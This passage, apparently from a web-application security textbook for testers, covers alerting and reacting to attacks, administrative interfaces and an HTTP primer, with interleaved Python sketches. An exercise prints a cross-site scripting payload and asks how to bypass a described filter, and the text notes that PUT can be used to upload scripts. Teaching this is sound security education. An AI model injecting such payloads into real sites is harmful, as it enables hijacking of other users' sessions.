In most situations, alerting mechanisms must balance the conflicting objec-

tives of reporting each genuine attack reliably and of not generating so many

alerts that these come to be ignored. A well-designed alerting mechanism can

use a combination of factors to diagnose that a determined attack is underway,

and can aggregate related events into a single alert where possible. Anomalous

events monitored by alerting mechanisms often include:

■■

Usage anomalies, such as large numbers of requests being received

from a single IP address or user, indicating a scripted attack.

■■

Business anomalies, such as an unusual number of funds transfers

being made to or from a single bank account.

■■

Requests containing known attack strings.

■■

Requests where data that is hidden from ordinary users has been

modified.
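The first kind of anomaly in this list, a large number of requests from a single IP address, can be detected with a simple sliding window. The Python sketch below is one possible approach; the class name, the default limit, and the window length are arbitrary choices for illustration.

```python
from collections import defaultdict, deque


class RequestRateMonitor:
    """Flag a client that exceeds `limit` requests within `window` seconds."""

    def __init__(self, limit=100, window=60.0):
        self.limit = limit
        self.window = window
        self._seen = defaultdict(deque)

    def record(self, ip, now):
        """Record a request at time `now` (in seconds) and return True
        if this client is now over the limit."""
        times = self._seen[ip]
        times.append(now)
        # Discard requests that have fallen out of the window.
        while times and now - times[0] > self.window:
            times.popleft()
        return len(times) > self.limit
```

A real alerting mechanism would combine a signal like this with others before raising an alert, so that one busy but legitimate client does not generate noise.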

Some of these functions can be provided reasonably well by off-the-shelf

application firewalls and intrusion detection products. These typically use a

mixture of signature- and anomaly-based rules to identify malicious use of the

application, and may reactively block malicious requests as well as issue alerts

to administrators. These products can form a valuable layer of defense pro-

tecting a web application, particularly in the case of existing applications

known to contain problems but where resources to fix these are not immedi-

ately available. However, their effectiveness is normally limited by the fact

that each web application is different, and so the rules employed are inevitably

generic to some extent. Web application firewalls are normally good at identi-

fying the most obvious attacks, where an attacker submits standard attack

strings in each request parameter. However, many attacks are more subtle than

this, for example modifying the account number in a hidden field to access

another user’s data, or submitting requests out of sequence to exploit defects

in the application’s logic. In these cases, a request submitted by an attacker

may be identical to that submitted by a benign user — what makes it mali-

cious are the circumstances in which it is made.

In any security-critical application, the most effective way to implement

real-time alerting is to integrate this tightly with the application’s input vali-

dation mechanisms and other controls. For example, if a cookie is expected to

have one of a specific set of values, then any violation of this indicates that its

value has been modified in a way that is not possible for ordinary users of the

application. Similarly, if a user changes an account number in a hidden field to

identify a different user’s account, this strongly indicates malicious intent. The

application should already be checking for these attacks as part of its primary

defenses, and these protective mechanisms can easily hook into the applica-

tion’s alerting mechanism to provide fully customized indicators of malicious

activity. Because these checks have been tailored to the application’s actual

logic, with a fine-grained knowledge of how ordinary users should be behav-

ing, they are much less prone to false positives than any off-the-shelf solution,

however configurable or able to learn that solution may be.
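The cookie example can be sketched in Python as a validation check that also feeds the alerting mechanism. The set of permitted values and the alert callback are assumptions; in a real application the callback would be whatever interface the alerting system exposes.

```python
# Assumed set of values that the server itself issues for this cookie.
ALLOWED_LANGUAGES = {"en", "fr", "de"}


def check_language_cookie(value, alert):
    """Reject a language cookie outside the known set and raise an alert."""
    if value in ALLOWED_LANGUAGES:
        return True
    # An ordinary user with a standard browser cannot produce this value.
    alert(f"lang cookie tampered: {value!r}")
    return False
```

The check costs nothing extra, because the validation was needed anyway; the alert is simply a side effect of a failure that ordinary use should never cause.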

Reacting to Attacks

In addition to alerting administrators, many security-critical applications con-

tain built-in mechanisms to react defensively to users who are identified as

potentially malicious.

Because each application is different, most real-world attacks require an

attacker to probe systematically for vulnerabilities, submitting numerous

requests containing crafted input designed to indicate the presence of various

common vulnerabilities. Effective input validation mechanisms will identify

many of these requests as potentially malicious, and block the input from

having any undesirable effect on the application. However, it is sensible to

assume that some bypasses to these filters exist, and that the application does

contain some actual vulnerabilities waiting to be discovered and exploited. At

some point, an attacker working systematically is likely to discover these

defects.

For this reason, some applications take automatic reactive measures to frus-

trate the activities of an attacker who is working in this way, for example by

responding increasingly slowly to the attacker’s requests or by terminating the

attacker’s session, requiring him to log in or perform other steps before con-

tinuing the attack. While these measures will not defeat the most patient and

determined attacker, they will deter many more casual attackers, and will buy

additional time for administrators to monitor the situation and take more

drastic action if desired.
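A reactive policy of this kind might be sketched as follows in Python. The class name, the doubling of the delay, and the thresholds are all assumptions made for illustration; the sketch only computes the reaction and leaves it to the caller to apply the delay or end the session.

```python
class ReactivePolicy:
    """Slow down, and eventually terminate, sessions that keep
    submitting requests identified as potentially malicious."""

    def __init__(self, base_delay=0.5, max_delay=30.0, terminate_after=5):
        self.base_delay = base_delay
        self.max_delay = max_delay
        self.terminate_after = terminate_after
        self._strikes = {}

    def register_suspicious(self, session_id):
        """Return (delay_in_seconds, terminate_session) for this request."""
        strikes = self._strikes.get(session_id, 0) + 1
        self._strikes[session_id] = strikes
        # Double the delay with each strike, up to a ceiling.
        delay = min(self.base_delay * 2 ** (strikes - 1), self.max_delay)
        return delay, strikes >= self.terminate_after
```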

Reacting to apparent attackers is not, of course, a substitute for fixing any

vulnerabilities that exist within the application. However, in the real world,

even the most diligent efforts to purge an application of security flaws may

leave some exploitable defects remaining. Placing further obstacles in the way

of an attacker is an effective defense-in-depth measure that reduces the likeli-

hood that any residual vulnerabilities will be found and exploited.

Managing the Application

Any useful application needs to be managed and administered, and this facil-

ity often forms a key part of the application’s security mechanisms, providing

a way for administrators to manage user accounts and roles, access monitoring

and audit functions, perform diagnostic tasks, and configure aspects of the

application’s functionality.

In many applications, administrative functions are implemented within the

application itself, accessible through the same web interface as its core nonse-

curity functionality, as shown in Figure 2-8. Where this is the case, the admin-

istrative mechanism represents a critical part of the application’s attack

surface. Its primary attraction for an attacker is as a vehicle for privilege esca-

lation, for example:

■■

Weaknesses in the authentication mechanism may enable an attacker

to gain administrative access, effectively compromising the entire

application.

■■

Many applications do not implement effective access control of some of

their administrative functions. An attacker may find a means of creat-

ing a new user account with powerful privileges.

■■

Administrative functionality often involves displaying data that origi-

nated from ordinary users. Any cross-site scripting flaws within the

administrative interface can lead to compromise of a user session that is

guaranteed to have powerful privileges.

■■

Administrative functionality is often subjected to less rigorous security

testing, because its users are deemed to be trusted, or because penetra-

tion testers are given access to only low-privileged accounts. Further, it

often has a need to perform inherently dangerous operations, involving

access to files on disk or operating system commands. If an attacker can

compromise the administrative function, they can often leverage it to

take control of the entire server.

Figure 2-8: An administrative interface within a web application.

Chapter Summary

Despite their extensive differences, virtually all web applications employ the

same core security mechanisms in some shape or form. These mechanisms

represent an application’s primary defenses against malicious users, and

therefore also comprise the bulk of the application’s attack surface. The vul-

nerabilities we shall examine later in this book mainly arise from defects

within these core mechanisms.

Of these components, the mechanisms for handling user access and user

input are the most important and should take up most of your attention when

you are targeting an application. Defects in these mechanisms often lead to

complete compromise of the application, enabling you to access data belong-

ing to other users, perform unauthorized actions, and inject arbitrary code and

commands.

Questions

Answers can be found at www.wiley.com/go/webhacker.

1. Why are an application’s mechanisms for handling user access only as

strong as the weakest of these components?

2. What is the difference between a session and a session token?

3. Why is it not always possible to use a whitelist-based approach to input

validation?

4. You are attacking an application that implements an administrative

function. You do not have any valid credentials to use the function.

Why should you nevertheless pay very close attention to it?

5. An input validation mechanism designed to block cross-site scripting

attacks performs the following sequence of steps on an item of input:

1. Strip any <script> expressions that appear.

2. Truncate the input to 50 characters.

3. Remove any quotation marks within the input.

4. URL-decode the input.

5. If any items were deleted, return to step 1.

Can you bypass this validation mechanism to smuggle the following

data past it?

"><script>alert("foo")</script>

CHAPTER 3

Web Application Technologies

Web applications employ a myriad of different technologies to implement

their functionality. This chapter contains a short primer on the key technologies

that you are likely to encounter when attacking web applications. We shall

examine the HTTP protocol, the technologies commonly employed on the

server and client sides, and the encoding schemes used to represent data in

different situations. These technologies are in general easy to understand, and

a grasp of their relevant features is key to performing effective attacks against

web applications.

If you are already familiar with the key technologies used in web applications,

you can quickly skim through this chapter to confirm that there is nothing new

in here for you. If you are still learning how web applications work, you should

read this primer before continuing to the later chapters on specific vulnerabilities.

For further reading on any of the areas covered, we recommend HTTP:

The Definitive Guide by David Gourley and Brian Totty (O’Reilly, 2002).

The HTTP Protocol

The hypertext transfer protocol (HTTP) is the core communications protocol

used to access the World Wide Web and is used by all of today’s web applications.

It is a simple protocol that was originally developed for retrieving static

text-based resources, and has since been extended and leveraged in various

ways to enable it to support the complex distributed applications that are now

commonplace.

HTTP uses a message-based model in which a client sends a request mes-

sage, and the server returns a response message. The protocol is essentially

connectionless: although HTTP uses the stateful TCP protocol as its transport

mechanism, each exchange of request and response is an autonomous transac-

tion, and may use a different TCP connection.

HTTP Requests

All HTTP messages (requests and responses) consist of one or more headers,

each on a separate line, followed by a mandatory blank line, followed by an

optional message body. A typical HTTP request is as follows:

GET /books/search.asp?q=wahh HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
  application/x-shockwave-flash, application/vnd.ms-excel,
  application/vnd.ms-powerpoint, application/msword, */*
Referer: http://wahh-app.com/books/default.asp
Accept-Language: en-gb,en-us;q=0.5
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: wahh-app.com
Cookie: lang=en; JSESSIONID=0000tI8rk7joMx44S2Uu85nSWc_:vsnlc502

The first line of every HTTP request consists of three items, separated by

spaces:

■■

A verb indicating the HTTP method. The most commonly used method

is GET, whose function is to retrieve a resource from the web server. GET

requests do not have a message body, so there is no further data follow-

ing the blank line after the message headers.

■■

The requested URL. The URL functions as a name for the resource

being requested, together with an optional query string containing

parameters that the client is passing to that resource. The query string is

indicated by the

? character in the URL, and in the example there is a

single parameter with the name

q and the value wahh.

■■

The HTTP version being used. The only HTTP versions in common use

on the Internet are 1.0 and 1.1, and most browsers use version 1.1 by

default. There are a few differences between the specifications of these

two versions; however, the only difference you are likely to encounter

when attacking web applications is that in version 1.1 the

Host request

header is mandatory.

Some other points of interest in the example request are:

■■

The Referer header is used to indicate the URL from which the request

originated (for example, because the user clicked a link on that page).

Note that this header was misspelled in the original HTTP specification,

and the misspelled version has been retained ever since.

■■

The User-Agent header is used to provide information about the

browser or other client software that generated the request. Note that

the Mozilla prefix is included by most browsers for historical reasons —

this was the

User-Agent string used by the originally dominant Netscape

browser, and other browsers wished to assert to web sites that

they were compatible with this standard. As with many quirks from

computing history, it has become so established that it is still retained,

even on the current version of Internet Explorer, which made the

request shown in the example.

■■

The Host header is used to specify the hostname that appeared in the

full URL being accessed. This is necessary when multiple web sites are

hosted on the same server, because the URL sent in the first line of the

request does not normally contain a hostname. (See Chapter 16 for

more information about virtually hosted web sites.)

■■

The Cookie header is used to submit additional parameters that the

server has issued to the client (described in more detail later in this

chapter).
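The structure of a request described above can be made concrete with a short parser. The following is a minimal sketch in Python rather than a complete HTTP implementation. The function name parse_request is an illustrative assumption, and the sketch assumes that lines are separated by CRLF, as they are on the wire.

```python
def parse_request(raw: str):
    """Split a raw HTTP request into its first line, headers, and body."""
    # The blank line (CRLF CRLF) separates the headers from the optional body.
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    # First line: method, URL, and HTTP version, separated by spaces.
    method, url, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        # Split on the first colon only, because values may contain colons.
        name, _, value = line.partition(":")
        # Header names are case-insensitive, so normalize them to lower case.
        headers[name.strip().lower()] = value.strip()
    return method, url, version, headers, body


raw_request = (
    "GET /books/search.asp?q=wahh HTTP/1.1\r\n"
    "Referer: http://wahh-app.com/books/default.asp\r\n"
    "Host: wahh-app.com\r\n"
    "Cookie: lang=en\r\n"
    "\r\n"
)
method, url, version, headers, body = parse_request(raw_request)
```

Because this is a GET request, the body returned by the sketch is an empty string: nothing follows the blank line.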

HTTP Responses

A typical HTTP response is as follows:

HTTP/1.1 200 OK

Date: Sat, 19 May 2007 13:49:37 GMT

Server: IBM_HTTP_SERVER/1.3.26.2 Apache/1.3.26 (Unix)

Set-Cookie: tracking=tI8rk7joMx44S2Uu85nSWc

Pragma: no-cache

Expires: Thu, 01 Jan 1970 00:00:00 GMT

Content-Type: text/html;charset=ISO-8859-1

Content-Language: en-US

Content-Length: 24246

<!DOCTYPE html PUBLIC “-//W3C//DTD HTML 4.01 Transitional//EN”>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">

...

The first line of every HTTP response consists of three items, separated by

spaces:

■■

The HTTP version being used.

■■

A numeric status code indicating the result of the request. 200 is the

most common status code; it means that the request was successful and

the requested resource is being returned.

■■

A textual “reason phrase” further describing the status of the response.

This can have any value and is not used for any purpose by current

browsers.

Some other points of interest in the previous response are:

■■

The Server header contains a banner indicating the web server soft-

ware being used, and sometimes other details such as installed modules

and the server operating system. The information contained may or

may not be accurate.

■■

The Set-Cookie header is issuing the browser a further cookie; this will

be submitted back in the

Cookie header of subsequent requests to this

server.

■■

The Pragma header is instructing the browser not to store the response

in its cache, and the

Expires header also indicates that the response

content expired in the past and so should not be cached. These instruc-

tions are frequently issued when dynamic content is being returned, to

ensure that browsers obtain a fresh version of this content on subse-

quent occasions.

■■

Almost all HTTP responses contain a message body following the blank

line after the headers, and the

Content-Type header indicates that the

body of this message contains an HTML document.

■■

The Content-Length header indicates the length of the message body in

bytes.
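A response can be taken apart in the same way as a request. The sketch below is illustrative only: parse_response and header_values are hypothetical helper names, the sample response is a shortened version of the one shown earlier, and CRLF line endings are assumed.

```python
def parse_response(raw: str):
    """Split a raw HTTP response into status line, headers, and body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    # Status line: HTTP version, numeric status code, optional reason phrase.
    parts = lines[0].split(" ", 2)
    version, code = parts[0], int(parts[1])
    reason = parts[2] if len(parts) > 2 else ""
    # Keep headers as a list of pairs, because some headers (such as
    # Set-Cookie) can legitimately appear more than once.
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return version, code, reason, headers, body


def header_values(headers, name):
    """Return every value recorded for the given header name."""
    return [value for key, value in headers if key == name.lower()]


raw_response = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache/1.3.26 (Unix)\r\n"
    "Set-Cookie: tracking=tI8rk7joMx44S2Uu85nSWc\r\n"
    "Content-Type: text/html;charset=ISO-8859-1\r\n"
    "Content-Length: 13\r\n"
    "\r\n"
    "<html></html>"
)
version, code, reason, headers, body = parse_response(raw_response)
```

In this sample, the Content-Length value matches the number of bytes in the body, which is the relationship the header is meant to express.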

HTTP Methods

When you are attacking web applications, you will be dealing almost exclu-

sively with the most commonly used methods:

GET and POST. There are some

important differences between these methods which you need to be aware of,

and which can affect an application’s security if overlooked.

The

GET method is designed for retrieval of resources. It can be used to send

parameters to the requested resource in the URL query string. This enables users

to bookmark a URL for a dynamic resource that can be reused by themselves or

other users to retrieve the equivalent resource on a subsequent occasion (as in a

bookmarked search query). URLs are displayed on-screen, and are logged in

various places, such as the browser history and the web server’s access logs.

They are also transmitted in the

Referer header to other sites when external

links are followed. For these reasons, the query string should not be used to

transmit any sensitive information.

The

POST method is designed for performing actions. With this method,

request parameters can be sent both in the URL query string and in the body

of the message. Although the URL can still be bookmarked, any parameters

sent in the message body will be excluded from the bookmark. These parame-

ters will also be excluded from the various locations in which logs of URLs are

maintained and from the

Referer header. Because the POST method is

designed for performing actions, if a user clicks the Back button of the browser

to return to a page that was accessed using this method, the browser will not

automatically reissue the request but will warn the user of what it is about to

do, as shown in Figure 3-1. This prevents users from unwittingly performing

an action more than once. For this reason,

POST requests should always be used

when an action is being performed.

Figure 3-1: Browsers do not automatically reissue POST requests made by users,

because these might result in an action being performed more than once
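The practical difference between the two methods is where the parameters travel. The following sketch builds one request of each kind. The helper names, the /login.asp path, and the user and pass parameters are assumptions made for illustration and do not come from any real application.

```python
from urllib.parse import urlencode


def build_get(path, params, host):
    # Parameters travel in the URL query string; there is no message body.
    return f"GET {path}?{urlencode(params)} HTTP/1.1\r\nHost: {host}\r\n\r\n"


def build_post(path, params, host):
    # Parameters travel in the message body, so they stay out of the URL,
    # and therefore out of bookmarks, URL logs, and the Referer header.
    body = urlencode(params)
    return (
        f"POST {path} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n"
        f"Content-Length: {len(body)}\r\n"
        "\r\n"
        f"{body}"
    )


get_request = build_get("/books/search.asp", {"q": "wahh"}, "wahh-app.com")
post_request = build_post(
    "/login.asp", {"user": "alice", "pass": "s3cret"}, "wahh-app.com"
)
```

In the POST request, the password appears only after the blank line, whereas any parameter placed in the query string of either request would be visible in the first line.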

In addition to the GET and POST methods, the HTTP protocol supports

numerous other methods that have been created for specific purposes. The

other methods you are most likely to require knowledge of are:

■■

HEAD — This functions in the same way as a GET request except that

the server should not return a message body in its response. The server

should return the same headers that it would have returned to the cor-

responding

GET request. Hence, this method can be used for checking

whether a resource is present before making a

GET request for it.

■■

TRACE — This method is designed for diagnostic purposes. The server

should return in the response body the exact contents of the request

message that it received. This can be used to detect the effect of any

proxy servers between the client and server that may manipulate the

request. It can also sometimes be used as part of an attack against other

application users (see Chapter 12).

■■

OPTIONS — This method asks the server to report the HTTP methods

that are available for a particular resource. The server will typically

return a response containing an

Allow header that lists the available

methods.

■■

PUT — This method attempts to upload the specified resource to the

server, using the content contained in the body of the request. If this

method is enabled, then you may be able to leverage it to attack the

application; for example, by uploading an arbitrary script and execut-

ing this on the server.

Many other HTTP methods exist that are not directly relevant to attacking

web applications. However, a web server may expose itself to attack if certain

dangerous methods are available. See Chapter 17 for further details on these

and examples of using them in an attack.
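When probing which methods a server supports, the Allow header returned to an OPTIONS request is the natural starting point. The sketch below parses such a header and flags the methods singled out above. The function names, the /books/ path, and the sample Allow value are hypothetical.

```python
# Methods described above as potentially useful to an attacker when enabled.
RISKY_METHODS = {"PUT", "TRACE"}


def allowed_methods(allow_header: str) -> set:
    """Parse the value of an Allow header into a set of method names."""
    return {m.strip().upper() for m in allow_header.split(",") if m.strip()}


def risky_methods(allow_header: str) -> set:
    """Return the advertised methods that deserve a closer look."""
    return allowed_methods(allow_header) & RISKY_METHODS


# The request you might send, and a reply value a server might give.
options_request = "OPTIONS /books/ HTTP/1.1\r\nHost: wahh-app.com\r\n\r\n"
allow_value = "GET, HEAD, POST, OPTIONS, TRACE, PUT"
flagged = risky_methods(allow_value)
```

Note that the Allow header only reports what the server claims to support, so any flagged method should still be confirmed by actually attempting a request with it.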

URLs

A uniform resource locator (URL) is a unique identifier for a web resource, via

which that resource can be retrieved. The format of most URLs is as follows:

protocol://hostname[:port]/[path/]file[?param=value]

Several components in this scheme are optional, and the port number is nor-

mally only included if it diverges from the default used by the relevant proto-

col. The URL used to generate the HTTP request shown earlier is:

http://wahh-app.com/books/search.asp?q=wahh

In addition to this absolute form, URLs may be specified relative to a partic-

ular host, or relative to a particular path on that host, for example:

/books/search.asp?q=wahh

search.asp?q=wahh

These relative forms are often used in web pages to describe navigation

within the web site or application itself.
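The components of a URL, and the way relative forms are resolved, can be explored with Python's standard urllib.parse module. This is a small sketch; the base URL is the page from the Referer header in the earlier example request, used here on the assumption that the relative links appear on that page.

```python
from urllib.parse import parse_qs, urljoin, urlsplit

absolute = "http://wahh-app.com/books/search.asp?q=wahh"

# Break the absolute URL into protocol, hostname, port, path, and query.
parts = urlsplit(absolute)
params = parse_qs(parts.query)

# Relative URLs are resolved against the URL of the page containing them.
base = "http://wahh-app.com/books/default.asp"
host_relative = urljoin(base, "/books/search.asp?q=wahh")
path_relative = urljoin(base, "search.asp?q=wahh")
```

Both relative forms resolve to the same absolute URL, and parts.port is None because no port was given, so the protocol default applies.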

NOTE The correct technical term for a URL is actually URI (or uniform

resource identifier), but this term is really only used in formal specifications

and by those who wish to exhibit their pedantry.

HTTP Headers

HTTP supports a large number of different headers, some of which are

designed for specific unusual purposes. Some headers can be used for both

requests and responses, while others are specific to one of these message types.

The headers you are likely to encounter when attacking web applications are

listed here.

General Headers

■■

Connection — This is used to inform the other end of the communica-

tion whether it should close the TCP connection after the HTTP trans-

mission has completed or keep it open for further messages.

■■

Content-Encoding — This is used to specify what kind of encoding is

being used for the content contained in the message body, such as

gzip,

which is used by some applications to compress responses for faster

transmission.

■■

Content-Length — This is used to specify the length of the message

body, in bytes (except in the case of responses to

HEAD requests, when it

indicates the length of the body in the response to the corresponding

GET request).

■■

Content-Type — This is used to specify the type of content contained in

the message body; for example,

text/html for HTML documents.

■■

Transfer-Encoding — This is used to specify any encoding that was

performed on the message body to facilitate its transfer over HTTP. It is

normally used to specify chunked encoding when this is employed.
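Chunked encoding is worth understanding because a chunked body carries no Content-Length and must be reassembled before it can be read or modified. The following is a simplified decoder, offered as a sketch: decode_chunked is a hypothetical name, and the code ignores trailer headers and does no error handling.

```python
def decode_chunked(data: bytes) -> bytes:
    """Reassemble a message body sent with Transfer-Encoding: chunked."""
    body = b""
    pos = 0
    while True:
        # Each chunk starts with its size in hexadecimal, ended by CRLF.
        line_end = data.index(b"\r\n", pos)
        # Drop any optional chunk extension that follows a semicolon.
        size_field = data[pos:line_end].split(b";", 1)[0]
        size = int(size_field, 16)
        pos = line_end + 2
        if size == 0:
            break  # a zero-length chunk marks the end of the body
        body += data[pos:pos + size]
        pos += size + 2  # skip the chunk data and its trailing CRLF
    return body


chunked = b"4\r\nWiki\r\n5\r\npedia\r\n0\r\n\r\n"
decoded = decode_chunked(chunked)
```

The sample body consists of a 4-byte chunk, a 5-byte chunk, and the terminating zero-length chunk.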

Request Headers

■■

Accept — This is used to tell the server what kinds of content the client

is willing to accept, such as image types, office document formats, and

so on.

■■

Accept-Encoding — This is used to tell the server what kinds of content

encoding the client is willing to accept.

■■

Authorization — This is used to submit credentials to the server for one

of the built-in HTTP authentication types.

■■

Cookie — This is used to submit cookies to the server which were pre-

viously issued by it.

■■

Host — This is used to specify the hostname that appeared in the full

URL being requested.

■■

If-Modified-Since — This is used to specify the time at which the

browser last received the requested resource. If the resource has not

changed since that time, the server may instruct the client to use its

cached copy, using a response with status code 304.

■■

If-None-Match — This is used to specify an entity tag, which is an iden-

tifier denoting the contents of the message body. The browser submits

the entity tag that the server issued with the requested resource when it

was last received. The server can use the entity tag to determine

whether the browser may use its cached copy of the resource.

■■

Referer — This is used to specify the URL from which the current

request originated.

■■

User-Agent — This is used to provide information about the browser or

other client software that generated the request.

Response Headers

■■

Cache-Control — This is used to pass caching directives to the browser

(for example,

no-cache).

■■

ETag — This is used to specify an entity tag. Clients can submit this

identifier in future requests for the same resource in the

If-None-Match

header to notify the server which version of the resource the browser

currently holds in its cache.

■■

Expires — This is used to instruct the browser how long the contents of

the message body are valid for. The browser may use the cached copy

of this resource until this time.

■■

Location — This is used in redirection responses (those with a status

code starting with 3) to specify the target of the redirect.

■■

Pragma — This is used to pass caching directives to the browser (for

example,

no-cache).

■■

Server — This is used to provide information about the web server soft-

ware being used.

■■

Set-Cookie — This is used to issue cookies to the browser that it will

submit back to the server in subsequent requests.

■■

WWW-Authenticate — This is used in responses with a 401 status code

to provide details of the type(s) of authentication supported by the

server.
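The interplay between the ETag response header and the If-None-Match request header can be sketched from the server's point of view. The function below is a simplified illustration under stated assumptions: conditional_status is a hypothetical name, header names are assumed to be lower-cased already, and only exact entity tag matches are considered.

```python
def conditional_status(request_headers: dict, current_etag: str) -> int:
    """Return 304 if the client's cached copy is current, otherwise 200."""
    submitted = request_headers.get("if-none-match", "")
    # A client may submit several entity tags separated by commas.
    client_tags = [tag.strip() for tag in submitted.split(",")]
    if current_etag in client_tags:
        return 304  # Not Modified: the browser may reuse its cached copy
    return 200  # the resource changed or was never cached, so send it again


fresh = conditional_status({"if-none-match": '"abc123"'}, '"abc123"')
stale = conditional_status({"if-none-match": '"old999"'}, '"abc123"')
first_visit = conditional_status({}, '"abc123"')
```

When testing an application, removing these request headers is a simple way to force the server to return the full resource instead of a 304 response.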

Cookies

Cookies are a key part of the HTTP protocol which most web applications rely

upon, and which can frequently be used as a vehicle for exploiting vulnerabil-

ities. The cookie mechanism enables the server to send items of data to the

client, which the client stores and resubmits back to the server. Unlike the

other types of request parameters (those within the URL query string or the

message body), cookies continue to be resubmitted in each subsequent request

without any particular action required by the application or the user.

A server issues a cookie using the

Set-Cookie response header, as already

observed:

Set-Cookie: tracking=tI8rk7joMx44S2Uu85nSWc

The user’s browser will then automatically add the following header to sub-

sequent requests back to the same server:

Cookie: tracking=tI8rk7joMx44S2Uu85nSWc

Cookies normally consist of a name/value pair, as shown, but may consist

of any string that does not contain a space. Multiple cookies can be issued by

using multiple

Set-Cookie headers in the server’s response, and are all sub-

mitted back to the server in the same

Cookie header, with a semicolon sepa-

rating different individual cookies.

In addition to the cookie’s actual value, the

Set-Cookie header can also

include any of the following optional attributes, which can be used to control

how the browser handles the cookie:

■■

expires — Used to set a date until which the cookie is valid. This will

cause the browser to save the cookie to persistent storage, and it will be

reused in subsequent browser sessions until the expiration date is

reached. If this attribute is not set, the cookie is used only in the current

browser session.

■■

domain — Used to specify the domain for which the cookie is valid.

This must be the same or a parent of the domain from which the cookie

is received.

■■

path — Used to specify the URL path for which the cookie is valid.

■■

secure – If this attribute is set, then the cookie will only ever be submit-

ted in HTTPS requests.

■■

HttpOnly — If this attribute is set, then the cookie cannot be directly

accessed via client-side JavaScript, although not all browsers support

this restriction.

Each of these cookie attributes can impact the security of the application,

and the primary impact is on the ability of an attacker to directly target other

users of the application. See Chapter 12 for further details.
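Python's standard http.cookies module can be used to inspect cookies and their attributes. In the sketch below, each string passed to load stands for the value of one Set-Cookie header. The attribute values (domain, path, and the two flags) are assumptions added for illustration and were not part of the example response shown earlier.

```python
from http.cookies import SimpleCookie

jar = SimpleCookie()
# Each string is the value of one Set-Cookie response header.
jar.load("lang=en; Path=/")
jar.load(
    "tracking=tI8rk7joMx44S2Uu85nSWc; Domain=wahh-app.com; Path=/; "
    "Secure; HttpOnly"
)

tracking = jar["tracking"]

# The browser returns all cookies in a single Cookie header,
# separated by semicolons, without any of the attributes.
cookie_header = "; ".join(
    f"{name}={morsel.value}" for name, morsel in jar.items()
)
```

The attributes control how the browser handles each cookie but are never sent back to the server, which receives only the name/value pairs.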

Status Codes

Each HTTP response message must contain a status code in its first line, indi-

cating the result of the request. The status codes fall into five groups, accord-

ing to the first digit of the code:

■■

1xx — Informational.

■■

2xx — The request was successful.

■■

3xx — The client is redirected to a different resource.

■■

4xx — The request contains an error of some kind.

■■

5xx — The server encountered an error fulfilling the request.

There are numerous specific status codes, many of which are used only in

specialized circumstances. The status codes you are most likely to encounter

when attacking a web application are listed here, together with the usual rea-

son phrase associated with them:

■■

100 Continue — This response is sent in some circumstances when a

client submits a request containing a body. The response indicates that

the request headers were received and that the client should continue

sending the body. The server will then return a second response when

the request has been completed.

■■

200 OK — This indicates that the request was successful and the

response body contains the result of the request.

■■

201 Created — This is returned in response to a PUT request to indicate

that the request was successful.

■■

301 Moved Permanently — This redirects the browser permanently to a

different URL, which is specified in the

Location header. The client

should use the new URL in the future rather than the original.

■■

302 Found — This redirects the browser temporarily to a different URL,

which is specified in the

Location header. The client should revert to

the original URL in subsequent requests.

■■

304 Not Modified — This instructs the browser to use its cached copy

of the requested resource. The server uses the

If-Modified-Since and

If-None-Match request headers to determine whether the client has the

latest version of the resource.

■■

400 Bad Request — This indicates that the client submitted an invalid

HTTP request. You will probably encounter this when you have modi-

fied a request in certain invalid ways, for example by placing a space

character into the URL.

■■

401 Unauthorized — The server requires HTTP authentication before

the request will be granted. The

WWW-Authenticate header contains

details of the type(s) of authentication supported.

■■

403 Forbidden — This indicates that no one is allowed to access the

requested resource, regardless of authentication.

■■

404 Not Found — This indicates that the requested resource does not

exist.

■■

405 Method Not Allowed — This indicates that the method used in the

request is not supported for the specified URL. For example, you may

receive this status code if you attempt to use the

PUT method where it is

not supported.

■■

413 Request Entity Too Large — If you are probing for buffer overflow

vulnerabilities in native code, and so submitting long strings of data,

this indicates that the body of your request is too large for the server to

handle.

■■

414 Request URI Too Long — Similar to the previous response, this

indicates that the URL used in the request is too large for the server to

handle.

■■

500 Internal Server Error — This indicates that the server encountered

an error fulfilling the request. This normally occurs when you have sub-

mitted unexpected input that caused an unhandled error somewhere

within the application’s processing. You should review the full contents

of the server’s response closely for any details indicating the nature of

the error.

■■

503 Service Unavailable — This normally indicates that, although

the web server itself is functioning and able to respond to requests, the

application accessed via the server is not responding. You should verify

whether this is the result of any action that you have performed.
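When reviewing large numbers of responses, it helps to sort them by status code group first. The following sketch does this using the first digit of the code, and looks up the usual reason phrase in Python's standard http.HTTPStatus enumeration. The group labels and the function name describe are illustrative choices.

```python
from http import HTTPStatus

# The five groups, keyed by the first digit of the status code.
STATUS_GROUPS = {
    1: "informational",
    2: "success",
    3: "redirection",
    4: "client error",
    5: "server error",
}


def describe(code: int):
    """Return the group of a status code and its usual reason phrase."""
    group = STATUS_GROUPS.get(code // 100, "unknown")
    try:
        phrase = HTTPStatus(code).phrase
    except ValueError:
        phrase = ""  # a code the standard library does not define
    return group, phrase


not_found = describe(404)
redirect = describe(302)
server_error = describe(500)
```

A server may return a code that is not defined by the standard; the group can still be determined from the first digit, which is why the lookup of the phrase is allowed to fail.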

HTTPS

The HTTP protocol uses plain TCP as its transport mechanism, which is unen-

crypted and so can be intercepted by an attacker who is suitably positioned on

the network. HTTPS is essentially the same application-layer protocol as

HTTP, but this is tunneled over the secure transport mechanism, Secure Sock-

ets Layer (SSL). This protects the privacy and integrity of all data passing over

the network, considerably reducing the possibilities for noninvasive intercep-

tion attacks. HTTP requests and responses function in exactly the same way

regardless of whether SSL is used for transport.

NOTE SSL has now strictly been superseded by transport layer security (TLS),

but the latter is still normally referred to using the older name.

HTTP Proxies

An HTTP proxy server is a server that mediates access between the client

browser and the destination web server. When a browser has been configured

to use a proxy server, it makes all of its requests to that server, and the proxy

relays the requests to the relevant web servers, and forwards their responses

back to the browser. Most proxies also provide additional services, including

caching, authentication, and access control.

There are two differences in the way HTTP works when a proxy server is

